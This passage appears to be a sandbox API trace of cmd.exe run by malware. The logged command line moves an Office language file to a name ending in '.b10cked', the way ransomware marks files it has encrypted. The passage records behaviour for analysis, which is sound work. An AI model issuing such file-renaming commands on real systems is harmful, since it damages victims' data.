SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.400] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.400] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.401] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.401] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.401] GetEnvironmentStringsW () returned 0x1e0210* [0172.401] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.401] GetEnvironmentStringsW () returned 0x1e0210* [0172.401] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9d4 | out: phkResult=0x12e9d4*=0x40) returned 0x0 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0xa0, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x0, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegCloseKey (hKey=0x40) returned 0x0 [0172.402] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9d4 | out: phkResult=0x12e9d4*=0x40) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x0, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, 
lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegCloseKey (hKey=0x40) returned 0x0 [0172.402] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.402] srand (_Seed=0x5b886388) [0172.402] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" [0172.402] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" [0172.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.403] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.403] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.403] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.403] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.403] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.403] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.403] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.403] GetEnvironmentStringsW () returned 0x1e2360* [0172.404] FreeEnvironmentStringsW (penv=0x1e2360) returned 1 [0172.404] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.404] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.404] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.404] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.404] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.404] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.404] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.404] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a0, lpFilePart=0x12f79c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f79c*="Desktop") returned 0x18 [0172.404] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.404] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.404] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.404] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.405] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.405] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.405] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.405] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.405] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.405] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.405] GetEnvironmentStringsW () returned 0x1e0210* [0172.406] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.406] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.406] GetConsoleOutputCP () returned 0x1b5 [0172.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.406] GetUserDefaultLCID () returned 0x409 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="0") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="0") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="1") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.407] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.407] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.408] GetConsoleTitleW (in: lpConsoleTitle=0x1d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.409] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.410] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.410] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.410] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.410] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.410] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.410] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.410] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.414] GetConsoleTitleW (in: lpConsoleTitle=0x12f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.540] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.540] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.540] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.540] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.540] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.540] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.540] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.540] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.542] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f394, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f38c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f38c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.542] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.543] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.543] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0172.543] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0172.543] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~2.trx")) returned 0x2020 [0172.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.543] SetErrorMode (uMode=0x0) returned 0x0 [0172.543] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x12ed1c, lpFilePart=0x12ed04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", lpFilePart=0x12ed04*="PPINTL~2.TRX") returned 0x3c [0172.544] SetErrorMode (uMode=0x0) returned 0x1 [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.544] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0172.544] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~2.trx")) returned 0x2020 [0172.544] SetErrorMode (uMode=0x0) returned 0x0 [0172.544] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x12f198, lpFilePart=0x12ef30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", lpFilePart=0x12ef30*="PPINTL~2.TRX") returned 0x3c [0172.544] SetErrorMode (uMode=0x0) returned 0x1 
[0172.544] SetErrorMode (uMode=0x0) returned 0x0 [0172.544] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a0, lpFilePart=0x12ef30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x12ef30*="PPINTL.REST.trx_dll.b10cked") returned 0x4b [0172.544] SetErrorMode (uMode=0x0) returned 0x1 [0172.544] SetLastError (dwErrCode=0x0) [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll.b10cked")) returned 0xffffffff [0172.544] GetLastError () returned 0x2 [0172.544] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x12e8ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8ac) returned 0x1e2130 [0172.545] FindNextFileW (in: hFindFile=0x1e2130, lpFindFileData=0x12e8ac | out: lpFindFileData=0x12e8ac) returned 0 [0172.545] GetLastError () returned 0x12 [0172.545] FindClose (in: hFindFile=0x1e2130 | out: hFindFile=0x1e2130) returned 1 [0172.546] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1e1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1cc0) returned 0x1e2130 [0172.546] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.546] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x12eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0172.546] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll")) returned 0x2020 [0172.546] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.547] FindClose (in: hFindFile=0x1e2130 | out: hFindFile=0x1e2130) returned 1 [0172.547] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eaf8 | out: _Buffer=" 1") returned 9 [0172.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.547] GetFileType (hFile=0x7) returned 0x2 [0172.547] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea84 | out: lpMode=0x12ea84) returned 1 [0172.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.547] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eab8 | out: lpConsoleScreenBufferInfo=0x12eab8) returned 1 [0172.547] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.548] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eaf8 | out: lpBuffer=" 1 
